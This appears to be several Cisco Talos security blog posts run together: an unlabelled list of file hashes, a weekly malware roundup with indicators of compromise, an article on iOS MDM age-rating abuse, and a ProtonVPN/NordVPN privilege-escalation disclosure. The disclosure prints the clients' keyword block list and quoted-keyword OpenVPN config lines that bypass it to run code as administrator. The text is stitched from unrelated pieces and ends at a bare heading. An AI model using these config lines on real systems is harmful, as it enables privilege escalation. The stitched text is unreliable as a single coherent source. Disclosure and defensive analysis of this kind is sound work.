442e4a8d35f9de21d5cbd9a695a24b9ac8120e548119c7f9f881ee16ad3761e6 bashf
7674e0b69d848e0b9ff8b82df8671f9889f33ab1a664f299bcce13744e08954c bashg
7051c9af966d1c55a4096e2af2e6670d4fc75e00b2b396921a79549fb16d03d4 lowerv2.sh
2f5bf7f1ea7a84828aa70f1140774f3d4ce9985d05a676c8535420232e2af87e pools.txt
ba29d8a259d33d483833387fad9c7231fbb3beb9f4e0603b204523607c622a03 config.json
7c2dbc0d74e01a5e7c13b4a41d3a1f7564c165bd532e4473acea6f46405d0889 r88.sh
d44e767132d68fdb07c23c848ff8c28efe19d1b7c070161b7bd6c0ccfc858750 rootv2.sh
35cb971daafd368b71ad843a4e0b81c80225ec20d7679cfbf78e628ebcada542 Install.exe
654ec27ea99c44edc03f1f3971d2a898b9f1441de156832d1507590a47b41190 ZZYO
F808A42B10CF55603389945A549CE45EDC6A04562196D14F7489AF04688F12BC XbashY
725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054 reg9.sct
d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6 m.png
ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50 hidden executable in m.png

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 24 and 31. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

• Win.Dropper.Zusy-6664573-0
  Dropper
  Zusy is a trojan that injects itself into other Windows processes and the browser to steal valuable information. The malware also has anti-debugging and anti-VM capabilities. It contacts a hardcoded command and control (C2) server.
   
• Win.Dropper.Zbot-6664565-0
  Dropper
  Zeus (AKA Zbot) is a trojan package used to carry out numerous malicious tasks. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
   
• Win.Dropper.Ponystealer-6664556-0
  Dropper
  This malware is a dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications and other software.
   
• Win.Malware.Generic-6664552-0
  Malware
  This malware cluster leverages common Windows registry persistence techniques to execute malicious Visual Basic scripts and executables on the system.
   
• Win.Dropper.Llac-6664551-0
  Dropper
  This malicious remote access tool (RAT) uses registry persistence and stores various data on the disk to exfil it to a C2 server.
   
• Win.Dropper.Weecnaw-6649176-0
  Dropper
  Also known as Razy, is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host, formats and encrypts the data, and sends it to a C2 server.
   

---

Threats

Win.Dropper.Zusy-6664573-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: internat.exe
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: {AA2468DC-A531-6EB0-5169-325772D6D0FF}

Mutexes

• Frz_State

IP Addresses

• 23[.]253[.]126[.]58

Domain Names

• aliluya[.]in

Files and or directories created

• %LocalAppData%\Temp\~DFB720FA4531A3BD3A.TMP
• %LocalAppData%\Temp\tmpc080dd22.bat
• %AppData%\Media Center Programs\mgrMediaCenterPrograms.exe

File Hashes

• 0086199586b4d80cf759ee7496d67106ea778c6d0d09b806af0d9942927b95a7
• 0b4d9d3231a26031b91afb86601e02ae8688311f4ad171a9ec7583df21035c4b
• 0c62bb710b7ae67438d05221daf95d71816591ec19add296e3c461ad6ac2ad89
• 1c40de31f1d99b153d9c1195e41873b064f28d1169376fb5989927fefb7e279e
• 1c6d8fd83497dade09939bda7e62803b3a271b0ddd91de8189666f2d33e52813
• 3256780354a83a758a07e4b705ad83be599edeebeb26ace0586913fabe4457bf
• 38184b0b4f6d7216d9d81a74af724285ae22c13c19d95e5f38703507d6abebe7
• 391e0759858ba5f58888afffc6b26594da9d79dbd8ba50c56828d7855d2e5ee9
• 56a4a40bccde01c52092ef1d5b241adac4ee7825d9556fdbef84c12c1feddc73
• 59c83f47fa21040feaf2885f4edebcb06eff21f24b9df980647e7a4d3fb9a2d0
• 5aa0c86a9e558671bd930e5a812b88ed19a7ebff291ed6b5a55c781b16dc7ea8
• 5e900d84431fcf62677eafa305ae03d03300c5fe74a98d825e3dfdf184c040b2
• 6963f52b20f628e9e31378ce0fdd3e2124010d8f775e05af3dab4a94b2a30b75
• 74d50d5b7c750105f2797bf2d145ff43eb0b2c76851b6c7de665464ec8642210
• 75872f30f9518032f327d82c602349f1cb304fc82a694d668ad7b5e0f6db2bf5
• 7636612f4b131119c7590757bc9c76b0fc3bbe40b8558b83b532ece91f6732b3
• 85f65115b4cdbb9401720770f1eaeca347b036694565d643c69d09b3be1e849a
• 928be3e04601466e47a567e422c7da279383bf6e23e513c352298a02d85823cb
• b323a535c8aee0c715e1a9821fe3d60c52a309ebf269b0173118dc91eaab700e
• b81bad519ab37a8b7ea6083113007202d6bdc52a357c4a82ab3433c3b1d86c6b
• cb6646bb13c59f72a36ef4c626dd93979caae8cdf26be0dd00be810af7d0cc53
• db942618b5b1a7c8d86b02aad84cde08642d482194104d194c9022216ca01234
• e0ed7aabff9ea95e2f839cad7acc9e7ffe2d2e458282b29c0d2db486c487a5d1
• e801b71fcb36a12a577668df03fd60ff1a4688fd8b4cbeb410d23731c5d62dcf
• eb5e76483e2c73c0a4a7c3701840ce932858268be01f4cda6dda69edd31e750a

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Zbot-6664565-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PRIVACY
  • Value Name: CleanCookies
• <HKCU>\SOFTWARE\MICROSOFT\SEUQV
  • Value Name: Ugtu
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: {06D9E66C-0AFF-8E20-8FE8-15D3DC7C7959}

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• neosz[.]org

Files and or directories created

• %LocalAppData%\Temp\tmp8bb49f41.bat
• %AppData%\Xenyed
• %AppData%\Xenyed\ilcoa.exe
• %AppData%\Ymcap
• %AppData%\Ymcap\noapb.dat

File Hashes

• 0285541620b688aac940d046ab3f4c7e60069512421ea353f4a556c5797fa9cf
• 07d1cf27ef446b7a9396f11ecbb3bff7a87af12aeee9fc883dffbd936cce57b4
• 095f4d3c133a236117fcc1c9f4ffac1dbe79da38d8f9e1dd29a60f24066875e6
• 1428e72b2e980bdad9095db2b4a4f717876c7401fbce8eaa89ab0c819ee757cd
• 282f842a03a9410b88b53f53bb63164a9c0a3f6da18e2f96591dac878ac7aa57
• 2878b048863aae2873ed90682fef68c8736188abd794f2c36b417e747edcfaed
• 28f8077f0bff09d8ea3da43c62872941219f1b6a982617df44b416279e3d349d
• 365ff8a7502272e69efe70386f40eb84a4098576564b188b41cec2c797b5d444
• 5ea643b56af71e4c3940a4796de973ab70e923b88a8d3b3e53c66cae64ea9a21
• 7230a35ea0eae6f00f6227eef9e1cb3fd0adf716bee3ff2e7285c9fc44209f28
• 731dc53c805261be26238ac99f28e5e505a0afe3396e18d76817330832b95815
• 856cf0c277af096077fe168c2036538c5d23f62eb125e6b63c48cfbf39c3507b
• de3bf89db7d8312fb6c9a6309ddda2ad8925915e57ae3509ffaa8e55a2479a7b
• ea8fa87b2501b9ac4d884fb53ec14fcf55f7877f68536640fd8c990f42997318
• f74da9f23d40cc7a7a6f513710a34e1693defa1b26356aaa5a93465454c900d3

Coverage

Screenshots of Detection

AMP




ThreatGrid

Win.Dropper.Ponystealer-6664556-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: AGP Manager
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
  • Value Name: AGP Manager.job
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
  • Value Name: AGP Manager.job.fp
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
  • Value Name: Path
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
  • Value Name: Hash
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
  • Value Name: Id
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER
  • Value Name: Index
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AED832F-FA37-41E1-9869-53556FC4E018}
  • Value Name: Triggers
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
  • Value Name: AGP Manager Task.job
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\COMPATIBILITYADAPTER\SIGNATURES
  • Value Name: AGP Manager Task.job.fp
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
  • Value Name: Path
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
  • Value Name: Hash
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
  • Value Name: Index
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\AGP MANAGER TASK
  • Value Name: Id
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5BA6AC36-8FC9-4BF2-8699-D1C5E4B53ED2}
  • Value Name: Triggers
• <HKLM>\Software\Wow6432Node\Microsoft\Windows Script Host\Settings
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
  • Value Name: calenderfile
• <HKLM>\http://szccf361.com//trqcer/xx/les/fre.php

Mutexes

• 3749282D282E1E80C56CAE5A
• CKVXlxMv

IP Addresses

• 185[.]148[.]241[.]42

Domain Names

• szccf361[.]com

Files and or directories created

• %LocalAppData%\Temp\subfolder
• %LocalAppData%\Temp\subfolder\calenderfile.scr
• %ProgramFiles% (x86)\AGP Manager
• %LocalAppData%\Temp\subfolder\calenderfile.vbs
• %ProgramFiles% (x86)\AGP Manager\agpmgr.exe
• %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5
• %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs
• %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator
• %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat
• %System32%\Tasks\AGP Manager
• %System32%\Tasks\AGP Manager Task
• %AppData%\D282E1
• %AppData%\D282E1\1E80C5.lck
• %LocalAppData%\Temp\tmpA720.tmp
• %AppData%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat
• %LocalAppData%\Temp\subfolder\.IgHiJkLiO
• %LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
• \PC*\MAILSLOT\NET\NETLOGON

File Hashes

• 36d338d4e27b80b605a8f41e6d5466c6c091f850460ad3438307fa310fee6124
• 37b97f4b355b4d5b8515afaac65be8d472739af29b0ae710af1cd7f3c72ada90
• 3db230f77666811830da80b685fce292b9f193e022dce1d4038cc8b9589ce9ea
• 4dc0fcb41a2337adf6ae7298d7c3d149690c424405da81691847d7a9dcfe0cd2
• 5b35f219098af55485f255877b0e00625ead753d08242496e74ca65d544ff32a
• 68dea7453ba1ffd5706fe544c18c0a74b6ed307b02591a5b12e9029ce0673cd6
• 7128acdf0af3ca1168c44a3440992dc118acaf21fa9e4fa7e9a49a22a87d8cd6
• 741d126dae4e162b0108c30336b9a2e85c3260b321e027f02150fe8c29a54e42
• 7ebb784df21a85f511a70c9914e42cca0f1634bbb54d83214719eba28d25076b
• 8d03f6a8455358b197a94366e18bd21a8f89dc3804f35b7c065b6fe3b28fdd44
• d6fd60308a1c812fae450e731dd184e33ed0d0a3c73fb7b99c35edfa174e22ac
• e3cb0f6d1f1d9dca58775aa58add608f67e32195bd53e9e9c00f720909ed80a1
• f793a85bfb4cd6ea3d8928d12ce678250a69bb210880901417508d52cca7cc75
• feee147fb9042914d58c0bdade8a314bb89e710b78cb6d3a9d4511e033e544e0

Coverage

Screenshots of Detection

AMP




ThreatGrid



Umbrella

Win.Malware.Generic-6664552-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
  • Value Name: Registry Key Name
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
  • Value Name: Hidden
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: Windows Update
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: Microsoft HD Video Card

Mutexes

• Remcos_Mutex_Inj
• remcos_fpvcewmpthnemuo

IP Addresses

• 104[.]16[.]16[.]96
• 77[.]79[.]239[.]196

Domain Names

• whatismyipaddress[.]com
• mail[.]alltracklogistic[.]com

Files and or directories created

• %LocalAppData%\Temp\subfolder
• %LocalAppData%\Temp\subfolder\filename.exe
• %LocalAppData%\Temp\holderwb.txt
• %AppData%\WindowsUpdate.exe
• %AppData%\pid.txt
• %AppData%\pidloc.txt
• %AppData%\Microsoft\Vault
• %LocalAppData%\Temp\~DFDC33AF0144AFBF01.TMP
• %LocalAppData%\Temp\subfolder\filename.vbs
• %LocalAppData%\Temp\~DF3457B4150AFB88CA.TMP
• %LocalAppData%\Temp\~DF72CB1D21ECC44F9B.TMP
• %LocalAppData%\Temp\hkj.exe
• %LocalAppData%\Temp\~DF0A22527376F8AA09.TMP
• %LocalAppData%\Temp\install.bat
• %AppData%\Microsoft HD Video Card\Microsoft HD Video Card.exe
• %LocalAppData%\Temp\bhv11EA.tmp

File Hashes

• 051b5663a5fd0aa611ccbbb92e385264b59e9495441b9412edc34ab6903f5177
• 0a13fbebefbb460de7565dfc7fd6b86674daecd42cfed4626ddcfe303d2b9670
• 237d9e85b5ebcacc0548757b50563c88e48495c942ecc34ae4dc70fd17f0e56c
• 43ff3bcd5e6161b482ebe381ccfdd5f25ad22e193172b4fbd2b42848e66fcc84
• 46fc6e30280595dae36c09e87be036859c91a75ea2cb7b30af667513754b4d61
• 52b3c994dd4e7d96b1806757af2ffae399559d2d4602facffbe5c20646a5d280
• 5693932850faa2d97f61a24c1dbf519fc44cc911b148a786a7b322c5d05d3cde
• 63abb6b27f686a6daf0efbb37ee8a881c70c4a786e69a18761c6aa69be026757
• 6d32d47f05162c9da374f9d5c1c003022b667a26bc130154fd2e8e785b499b39
• 6eb4d2104366d234000c4d24c13cf06f1784d428ea5700ab9a3171fb1d2499e1
• 8af8918383a6e8ae0426630aaafbdccb248d4661e392f0504bbc0dc3d942604c
• 8c966864d1115d71e2b6e96bb967ab849f6610f338e6fd3022c51fcf897dcd1f
• 9128bbb89e8497bff023af7f28187e5a9e98ff16534dbd3bbdcc2d5bbfcc66c9
• b070efa747e400efbf06aae4cc012e7793ca2773827207a773b6406eb5c09212
• ba06d969cfcc69452153a2f453520cc981680b79402419b018bf97552d1be97a
• c60c3ac771ccb72ba788e04d4add83786e26dfc54720c5270654b9215acbe0c0
• dbb9c698f74f9f113a444fba6e17e5c4931f6eebd1739465ea308d74ba827645
• e5156c3d6ea2b87371fe57aae68d5cc4b63dd0c8f6bcf651c56a2f6906d9f996
• ed12f4bb9e9157815266d0f14f707d72f72894043bef1116704e7b45e5704a2c
• f1d8d1363534e62e43213a0b625507aeb24f669ff65efdd6f414f769336b4841
• f2cdc306085686d1e8f38234f6a8a0ec9cfcc0f00dbcb81106b20807bd1ab5d3
• fdbb0b36d904b56348382ae39d2ca39347485f1ca6365c87b1b54bb6ea0dbc41

Coverage

Screenshots of Detection

AMP




ThreatGrid

Win.Dropper.Llac-6664551-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: internat.exe
• <HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
  • Value Name: Policies
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: HKLM
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{537S174K-BM25-YPUH-7HFF-B4DP4K21I7TL}
  • Value Name: StubPath
• <HKCU>\SOFTWARE\DREGRESS@HOTMAIL.COM
  • Value Name: FirstExecution
• <HKCU>\SOFTWARE\DREGRESS@HOTMAIL.COM
  • Value Name: NewIdentification
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\EXPLORER_RASAPI32
  • Value Name: EnableFileTracing

Mutexes

• _SHuassist.mtx
• WlekOENFlw
• WlekOENFlw_PERSIST
• _x_X_BLOCKMOUSE_X_x_
• _x_X_PASSWORDLIST_X_x_
• _x_X_UPDATE_X_x_
• WlekOENFlw_SAIR

IP Addresses

• N/A

Domain Names

• dregress[.]no-ip[.]biz

Files and or directories created

• %LocalAppData%\Temp\XX--XX--XX.txt
• %AppData%\system32\
• %AppData%\system32\explorer.exe
• %LocalAppData%\Temp\UuU.uUu
• %LocalAppData%\Temp\XxX.xXx
• %AppData%\logs.dat

File Hashes

• 5d3e533eddbec63bf8a4e4f55c2c92fdcaf55c48c8ced978fe9b2120ba8c978b
• 640f20202437cfda4b49cdf95dd3760ec3d76f23e5c473c568835c5e5b5ae721
• 67d07d8a0a78428347447f235a18804a9d9d814066c9dc4116d1581c2000d5ae
• 7c86998390a89147d142c1a3914d80cd648bbba9c07dc10a4fb6deee6b81b720
• 97fabe289c0d778fee300c7b52ad5013ac85bd2a39c3f724d458f4e9268738c6
• 9817dbfcf5e3136708c26171089ce0b55304a3b2165ddd85d02ee5188de05d41
• c070bcdf59f548025ad1b12dc1c33699a24963ef7bd4bc88bf29322551dbc440
• c76f9440d9f992954629a87620da8ef23f2a565870483242cb988eb0aa147743
• c86b94bcf90b4bb6a6318c22c1eaec125b7329e988fa20bc76e02f072806c288
• c8e13a8e304358e9b3b337c6a0dd8c8ade371078f153130474f83af7917e845d
• d90c74e44e999784659ae92d5b4a71095f66eb2a8a750f6fda17976ead3e0658
• e4cdc7979e494ebd9d7de24955064272bdce61a711f70ff32925b4b47c9320e9

Coverage

Screenshots of Detection

AMP



ThreatGrid

Win.Dropper.Weecnaw-6649176-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: internat.exe
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: Avast
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{I8877104-6125-5WU7-VAYG-S5K3CM2I1XV8}
  • Value Name: StubPath

Mutexes

• iTCUfMuY

IP Addresses

• 91[.]192[.]100[.]3

Domain Names

• iheuche009[.]hopto[.]org

Files and or directories created

• %AppData%\Install
• %AppData%\Install\Host.exe

File Hashes

• 00e3f5ffeb38495cefce0f1c9522743764adf1ee6ce51b91c9c4726726562a12
• 01a7bdfdc6502db6bd237fcbc64596d8f76052e942c2c87e897f1ae786b7cac2
• 02c5fa1012b9cf0d46801cadcc4fe6814b4f75d50104e948031d00ff3ca7b93c
• 035f91568ca2bad43ce3fde98a2ae0418821e5f558c62b919c786c3b07bc0fe2
• 03970d185025e7e226c704b5bcd13de89730677345d3d57081d07895966567d4
• 055865fb005e3969e6d9e7feba2e81a8bedbe3048bf2a9cd3a9fbfe8ea6076e5
• 063e213ee0ecae95132a3cea557203b782de3c63b753fbd405ed670e83fbf573
• 081fbe8f1c01676f9765ff7742b5d348433e2fd073136355100fe9f054140e6a
• 08c257d2e5938dc6539b463ba0689982b79c112c8ad0aaf1be247726622ea487
• 09c9b81d40f3c97876eaad0f29d7e9694c58c9a9cc4dc38b167611ecfbda3d75
• 0a032738a8ffc58b6cdce62ef209b247e008f597b6955d87da71e1654da970ef
• 0afde5386ca8587bca67577727f02c3e71b883b7b5fc72e25a0d542f6c5819c8
• 0f4fc18209bbb1d979cb504b807142e1a24aa8ee831e33ce8825a5bd350096fa
• 10427e9a0ee1b4e3d349d61839e1f09cb86b2a68d23e41933127dd5ce2da0134
• 1343648c8b4748294191cfdca4b4881a57cee96db4051530c514e7c56e1152e3
• 17983b493cd46b604ef3846516da1cda1628ec855b896be8b54a9558ae83058c
• 1bb84d812e0863ce21398678bf8facfe6864a33237d67d3416fbcab73226bdbe
• 1cb1870d583bef0aa1dbb99b30f0819b7490855786a85c5969be925b2719c6be
• 1fbac835a770d9b309ed87d3df0746bd28f1033f366ab35cde9e165f2b069388
• 260eaee5c9e8a7effb1698f670464e9b6aad29244dcb16434af489e65adc6d6c
• 2af2ef163e2035d3503ac8af23ffe8be8ca286dbf9c96aac6c8cebb61e9551c1
• 2b65d21294f9a06d570811d2e7aeec7ab4785e8840d79e8083791cc3684e4a92
• 2e7e5b2ac10a3591ab570028b6a230d51f117e1842b6d11f56499785c6faa1c6
• 2f0184defca0e2583f65e1e6d244a9e3cef8e3c83d02282ef797d97ee784869d
• 3276ac34b3c9f03cb9f1a259ed09043083e3adeaa82a41fc2dccfc51f20570c7

Coverage

Screenshots of Detection

AMP



ThreatGrid



Umbrella

This blog post is authored byWarren Mercer and Paul Rascagneres with contributions from Nick Biasini

Summary

Since our initial discovery of a malicious mobile device management (MDM) platform that was loading fake applications onto smartphones, we have gained greater insight into the attacker's methods. We now know how the attacker took advantage of a common MDM feature and used an iOS profile to hide and disable the legitimate versions of the apps to force the use of the malicious stand-ins.

Cisco Talos previously published two articles (here and here) on the subject. In the aforementioned campaigns, the attackers enrolled iOS devices into the MDM and used the devices to control the victim's devices, deploying malicious apps disguised as the messaging services WhatsApp, Telegram and Imo, as well as the web browser Safari.

After additional research, we now know that the attacker deployed the malicious apps after the actor deployed a profile on the enrolled devices and abused the age rating restriction functionality that exists on iOS devices. The age ratings for WhatsApp and Telegram are 12-plus and 17-plus, respectively. After the age rating limit was set to 9-plus, the installed legitimate applications disappeared from the device:






The app still exists on the device, however, the user will not be able to interact with it, even if the user searches for the app using the search function on the iOS device. It simply does not open.

All mobile device users should be aware of these attack methods as to prevent attackers from gaining control of their phones through an MDM. In the text and videos below, we will walk through the process of checking your phone for an unauthorized MDM and any changes in the age settings.

More details on the profile setup

In the iOS ecosystem, you can configure devices using profiles. This is an XML file that can be distributed to iOS devices. For example, the MDM enrollment mechanism is performed using a profile. Profiles can be easily created using the official Apple tool Apple Configurator 2. Thanks to these profiles, we can restrict app usage:



As you can see in the screenshot, the app restriction is limited to the supervised device. In our investigation, the enrolled iPhones were not in supervised mode, but the legitimate WhatsApp application disappeared to force the user to only have access to the malicious one. How?

The attackers used the age rating to forbid the usage of apps rated for ages 9 and above:



Here is the capture of the XML content of the profile hosted on the malicious MDM:

<key>ratingApps</key>
<integer>200</integer>
<key>ratingMovies</key>
<integer>1000</integer>
<key>ratingRegion</key>
<string>us</string>
<key>ratingTVShows</key>
<integer>1000</integer>

In this context, the 200 equates to the "age 9-plus" rating.

Once this profile is installed on the iOS device, the applications restricted by the age rating stay installed, but can no longer be used or accessed, and the icon disappears from the device springboard. Using the app store, you can see that the application is still installed, but the user cannot launch it. You can control the restriction settings on your device:



We can see that the restrictions are displayed as "disabled" — that's why the text is in grey. But, it is enabled.



If the profile is installed manually via Apple Configurator, or by opening the profile XML from Safari, a new entry will appear in the Settings > General > Profile menu. If the MDM deploys the profile, it does not appear (the MDM enrollment profile will be present).

How to check iPhone profiles

In the videos below, we are going to show you how an attacker can obtain access to your phone by enrolling you in a malicious MDM platform. You'll notice there is a fair amount of user interaction involved. However, if the attacker can correctly socially engineer a user via a phone call, or if they have physical access to the device, enrollment can be quick and effective.

The first video shows the enrollment process from an end user's perspective. We have carried out this test on an iPhone X running the latest 11.4.1 iOS from Apple. The lab phone used is not jailbroken or tampered with in any way. It's an iPhone X fresh out of the box updated to the latest iOS.



As you can see in the video, the user has accepted a couple of INSTALL/TRUST processes to allow the phone to be enrolled. Once we successfully enroll the phone within the malicious MDM, we could push profiles and applications on to the device. To this end, we were able to push a profile that had age restrictions in place, as detailed earlier in the blog, which meant that our legitimate WhatsApp application disappeared and, with our MDM access, we pushed a new malicious version of WhatsApp to the phone.

It's important to note here that there is no malicious malware, vulnerability or zero-day used to enroll the phone within the MDM. It is a legitimate method of device administration that is used within enterprises throughout the world. The attacker has merely leveraged this process.

Talos recommend the following methods to check if your phone has additional profiles or is enrolled in an MDM platform:

1. Users can view restrictions set by MDM profiles in Settings > General > Profiles & Device Management > [MDM configuration] > Restrictions

2. Users can also check which applications a MDM profile installed on their device in Settings > General > Profiles & Device Management > [MDM configuration] > Apps.

Note: If you do not have any PROFILE & DEVICE MANAGEMENT menu option available, this means the phone is currently not enrolled in an MDM, nor are there any additional profiles trusted on the phone.

Conclusion

When most consumers think about malware on their mobile devices, they usually think that they need to download a patch to fix a bug or vulnerability. However, this technique is not a vulnerability. Rather, it's an existing, legitimate feature used by this threat actor in order to hide the victim's legitimate applications and hide them while deploying a malicious version. This technique is completely opaque once the user enrolls in the MDM.

An MDM can silently deploy a profile. Therefore,e strongly recommend that iPhone profiles are audited and suspicious profiles are deleted. Additionally, you can check the restrictions menu on your phone to verify if an age rating is configured on it.

Discovered by Paul Rascagneres.

Overview

Cisco Talos has discovered two similar vulnerabilities in the ProtonVPN and NordVPN VPN clients. The vulnerabilities allow attackers to execute code as an administrator on Microsoft Windows operating systems from a standard user. The vulnerabilities were assigned to the CVE IDs TALOS-2018-0622 / CVE-2018-3952 (NordVPN) and TALOS-2018-0679 / CVE-2018-4010 (ProntonVPN).

The vulnerabilities are similar to a bug previously discovered by VerSprite in April 2018: CVE-2018-10169. That same month, both clients released similar patches to fix this flaw. However, we identified a way to bypass that patch. Despite the fix, it is still possible to execute code as an administrator on the system. The details section later on in this post will explain the first patch, why it was not successful, and how the editors finally fixed the problem.

Details

VPN clients' design

To understand the vulnerabilities, we first need to understand the design of the VPN clients mentioned in this article. Both clients have the same design:

• The user interface. This binary is executed with the permission of the logged-in user. The purpose of this application is to allow the user to select the VPN configuration, such as the protocol, the location of the VPN server, etc. The information is sent to a service when the user clicks on "connect" (it's, in fact, an OpenVPN configuration file).
• The service. This binary is used to receive orders from the user interface. For example, it receives the VPN configuration file from the user. The goal of the binary is to execute the OpenVPN client binary with the user configuration file (with administrator privileges).

The vulnerabilities in this article abuse the service and allow the standard user to execute arbitrary commands through OpenVPN with administrator privileges.

Initial vulnerability

The first vulnerability discovered by VerSprite is CVE-2018-10169. The author mentions he can create an OpenVPN configuration file with the following content:

plugin path\\OpenVPN_PoC.dll

This configuration file is sent to the service and will use this configuration for OpenVPN. The result is that OpenVPN_POC.dll will be loaded and executed by OpenVPN with administrator privileges.

First patch and limitation

ProtonVPN and NordVPN did the same patch. They implemented a control of the content of the OpenVPN configuration sent by the user:

if ( !text.StartsWithIgnoringCase("<tls-auth>") && 
     !text.StartsWithIgnoringCase("<ca>") && 
     OpenVpnConfigSecurityValidator.StartsWithName(text, "plugin") ||
     OpenVpnConfigSecurityValidator.StartsWithName(text, "script-security") || 
     OpenVpnConfigSecurityValidator.StartsWithName(text, "up") ||
     OpenVpnConfigSecurityValidator.StartsWithName(text, "down")))
{
  reason = string.Format("Invalid configuration file. Reason: {0}", text);
  return false;
}

This code checks if the configuration file sent by the user contains a line starting by plugin, script-security, up or down. These are all the methods to execute code or commands through OpenVPN.

Here is the code of the check:

private static bool StartsWithName(string line, string name)
   return line.StartsWithIgnoringCase(name + " ") || 
          line.StartsWithIgnoringCase(name + "\t") ||
          line.EqualsIgnoringCase(name);
}

The developer added additional tests to avoid tabulation or spaces before the keyword.

However, by reading the OpenVPN source code of the configuration file parser here, we can read in parse_line() function that a keyword can be between quotation marks. Therefore, we can add the following text in the configuration file:

"script-security" 2
"up" C:\\WINDOWS\\system32\\notepad.exe

It's valid for OpenVPN, and it passes the checks of the VPN services.


The service executes OpenVPN and it executes notepad.exe.

New patches

